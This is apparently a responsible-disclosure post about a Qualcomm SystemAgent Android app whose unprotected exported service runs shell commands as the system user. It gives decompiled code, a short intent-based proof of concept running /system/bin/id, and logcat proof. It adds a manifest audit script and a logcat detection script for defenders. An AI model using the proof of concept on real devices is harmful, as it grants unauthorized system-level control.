From +Tim Strazzere and my defcon workshop, our Qualcomm Escalation to System user vuln + other fun things. Responsibly disclosed to Qualcomm. It was in an apk that should have never shipped on a production device, but was accidentally included in at least one.

Product: TCL/ALCATEL_A564C/Yaris5NA:4.4.2/KVT49L/v4FAZ-0-0:user/release-keys

Application: Qualcomm SystemAgent (com.qualcomm.agent)

Vulnerability 1: Qualcomm SystemAgent application allows blind execution of shell commands as system user.

Local privilege escalation to the system user (uid 1000), inheriting the many supplementary groups of the system_app context (see the id output below).


The Qualcomm SystemAgent application has an unsecured service (exported because it declares an intent filter, and no android:permission is required to start it):

<service android:name="com.qualcomm.agent.SystemAgent">
    <intent-filter>
        <action android:name="android.system.fullagent" />
        <category android:name="android.intent.category.DEFAULT" />
    </intent-filter>
</service>
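The manifest above is the root cause: a service with an intent filter and no permission attribute is reachable by any app on the device. The following audit script is an added example (not from the original post or from Qualcomm) that applies the component-export rules to an apktool-decoded AndroidManifest.xml and lists every service, receiver or activity any caller can reach. The sample manifest is constructed: it reproduces the SystemAgent entry from the post and adds two contrasting components (a permission-gated service and an unexported receiver) with made-up names.

```python
"""Audit a decoded AndroidManifest.xml for components any app can reach.

Export rules applied (Android component semantics):
  * android:exported="true"                       -> exported
  * android:exported unset + <intent-filter>      -> exported by default
    (only below targetSdk 31; Android 12 requires the attribute)
  * exported and no android:permission            -> reachable by any caller
Content providers have different defaults and are deliberately not covered.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def find_unprotected_exports(manifest_xml, target_sdk=19):
    """Return [(kind, component name, reason)] for components reachable by any app."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    for kind in ("service", "receiver", "activity"):
        for comp in app.findall(kind):
            exported = _attr(comp, "exported")
            has_filter = comp.find("intent-filter") is not None
            if exported == "true":
                reason = 'android:exported="true"'
            elif exported is None and has_filter and target_sdk < 31:
                reason = "intent-filter present and android:exported unset (exported by default)"
            else:
                continue  # explicitly unexported, or no way for outside callers to reach it
            if _attr(comp, "permission") is None:
                findings.append((kind, _attr(comp, "name"), reason))
    return findings


# Constructed sample: the SystemAgent entry from the post plus two hardened
# contrasts with made-up names (com.example.*) and a made-up signature permission.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.qualcomm.agent">
  <permission android:name="com.example.permission.CONTROL_AGENT"
              android:protectionLevel="signature" />
  <application>
    <service android:name="com.qualcomm.agent.SystemAgent">
      <intent-filter>
        <action android:name="android.system.fullagent" />
        <category android:name="android.intent.category.DEFAULT" />
      </intent-filter>
    </service>
    <service android:name="com.example.GatedAgent"
             android:permission="com.example.permission.CONTROL_AGENT">
      <intent-filter>
        <action android:name="android.system.fullagent" />
      </intent-filter>
    </service>
    <receiver android:name="com.example.InternalReceiver" android:exported="false">
      <intent-filter>
        <action android:name="com.example.INTERNAL" />
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for kind, name, reason in find_unprotected_exports(SAMPLE_MANIFEST):
        print(f"{kind} {name}: {reason}")
```

Only the SystemAgent service is reported: the gated service is exported but requires a signature-level permission, and the receiver opts out with android:exported="false". Either of those two fixes would have closed the hole described in this post.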

When a startService intent with the fullagent action reaches the SystemAgent, the service splits the intent's "para" extra on commas and executes it as a command line, with no check on who sent it.

Values.ACTION_FULL_AGENT = "android.system.fullagent";

public int onStartCommand(Intent intent, int flags, int startId) {
    // .. snip ..
    else if(Values.ACTION_FULL_AGENT.equals(intent.getAction())) {
        // .. snip .. (the intent's "para" extra ends up in exec() below)
    }
    // .. snip ..
    return 1;
}

void exec(String para) {
    new Thread() {
        final SystemAgent this$0;   // decompiler artefacts: captured outer instance
        final String val$para;      // and the captured "para" argument

        public void run() {
            int v13 = 0x23;   // only the first 35 bytes of output are kept
            try {
                // Untrusted "para" becomes argv directly: no validation, no caller check.
                String[] paras = this.val$para.split(",");
                int i;
                for(i = 0; i < paras.length; ++i) {
                    SystemAgent.logd(i + ":" + paras[i]);
                }

                Process mProcess = Runtime.getRuntime().exec(paras);
                BufferedReader inBuffer = new BufferedReader(new InputStreamReader(mProcess.getInputStream()));
                // Read stdout to EOF (decompiler's for-loop reflowed as a while-loop).
                String data = "";
                String s;
                while((s = inBuffer.readLine()) != null) {
                    data = data + s + "\n";
                }

                int result = mProcess.exitValue();
                SystemAgent.logd("ExitValue=" + result);
                String resultProp = paras[0] + ",";
                if(result >= 0 && result != 0xFF) {
                    resultProp = data.length() > v13 ? resultProp + data.substring(0, 0x23) : resultProp + data;
                }

                // Command name plus truncated output is published in a system property.
                AgentUtils.setSystemProperties(Values.AGENT_RESULT_PROP, resultProp);
            }
            catch(Exception e) {
                // .. snip ..
            }
        }
    }.start();
}

ComponentName intentComponent = new ComponentName("com.qualcomm.agent", "com.qualcomm.agent.SystemAgent");
Intent serviceIntent = new Intent("android.system.fullagent");
serviceIntent.putExtra("para", "/system/bin/id");

From logcat:

D/SystemAgent( 4109): [onCreate] RUN
D/SystemAgent( 4109): [onStartCommand] 1
D/SystemAgent( 4109): [access$000] /system/bin/id
D/SystemAgent( 4109): [access$000] 0:/system/bin/id
D/SystemAgent( 4109): [access$000] uid=1000(system) gid=1000(system) groups=1000(system),1004(input),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),1028(sdcard_r),2002(diag),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3009(qcom_diag),41000(u0_a31000) context=u:r:system_app:s0
D/SystemAgent( 4109): [access$000] ExitValue=0
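Because the service logs every argv element, the uid line and the exit value under the SystemAgent tag, logcat is a usable detection source on devices that shipped this apk. The script below is an added example (not from the original post) that correlates those lines per pid into one event per command execution and reports the uid the command ran under. The input is constructed: the five SystemAgent lines from the post plus unrelated log lines to show they are ignored.

```python
"""Correlate SystemAgent logcat lines into command-execution events."""
import re

# Classic "brief" logcat format: D/Tag( pid): message
LOGCAT_LINE = re.compile(r"^[VDIWEF]/(?P<tag>[^(]+)\(\s*(?P<pid>\d+)\):\s*(?P<msg>.*)$")
# exec() logs each argv element as "<index>:<value>"; index 0 is the command.
ARGV0 = re.compile(r"^\[access\$000\] 0:(?P<argv0>\S+)")
# Output of id(1), if the command printed it.
ID_OUTPUT = re.compile(r"uid=(?P<uid>\d+)\((?P<user>\w+)\)")
EXIT_VALUE = re.compile(r"^\[access\$000\] ExitValue=(?P<exit>-?\d+)")


def parse_logcat(line):
    """Split one logcat line into tag, pid and message; None if it does not parse."""
    m = LOGCAT_LINE.match(line)
    return m.groupdict() if m else None


def detect_agent_commands(lines):
    """Return one dict per command run through SystemAgent:
    {"pid", "command", "uid", "exit_value"}.  An event opens on the argv[0]
    line and closes on the ExitValue line for the same pid."""
    pending = {}
    events = []
    for line in lines:
        rec = parse_logcat(line)
        if rec is None or rec["tag"] != "SystemAgent":
            continue
        pid, msg = rec["pid"], rec["msg"]
        m = ARGV0.match(msg)
        if m:
            pending[pid] = {"pid": int(pid), "command": m.group("argv0"),
                            "uid": None, "exit_value": None}
            continue
        ev = pending.get(pid)
        if ev is None:
            continue
        m = ID_OUTPUT.search(msg)
        if m:
            ev["uid"] = int(m.group("uid"))
        m = EXIT_VALUE.match(msg)
        if m:
            ev["exit_value"] = int(m.group("exit"))
            events.append(pending.pop(pid))
    return events


def ran_as_system(events):
    """Events whose command output shows it ran as uid 1000 (system)."""
    return [ev for ev in events if ev["uid"] == 1000]


# Constructed sample: the lines from the post interleaved with unrelated noise.
SAMPLE_LOG = [
    "I/ActivityManager(  812): Start proc com.qualcomm.agent for service",
    "D/SystemAgent( 4109): [onCreate] RUN",
    "D/SystemAgent( 4109): [onStartCommand] 1",
    "D/SystemAgent( 4109): [access$000] /system/bin/id",
    "D/SystemAgent( 4109): [access$000] 0:/system/bin/id",
    "D/SystemAgent( 4109): [access$000] uid=1000(system) gid=1000(system) "
    "groups=1000(system),1004(input),1010(wifi) context=u:r:system_app:s0",
    "D/OtherApp( 4200): uid=10031(u0_a31) just a distraction",
    "D/SystemAgent( 4109): [access$000] ExitValue=0",
]

if __name__ == "__main__":
    for ev in detect_agent_commands(SAMPLE_LOG):
        print(ev)
```

Any event at all is worth an alert on a production device, since nothing legitimate should be driving this service; `ran_as_system` just makes the severity explicit when the executed command happened to print its uid.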

Additional related vulnerabilities in SystemAgent application:

private void doSystemActions(String para), reachable through the same service, allows a caller to:
- Set system properties
- Write strings to files as the system user (writeFileAgent)
- Take a screenshot and save it to "/storage/sdcard1/logs/screenshot.png"
- Reboot the device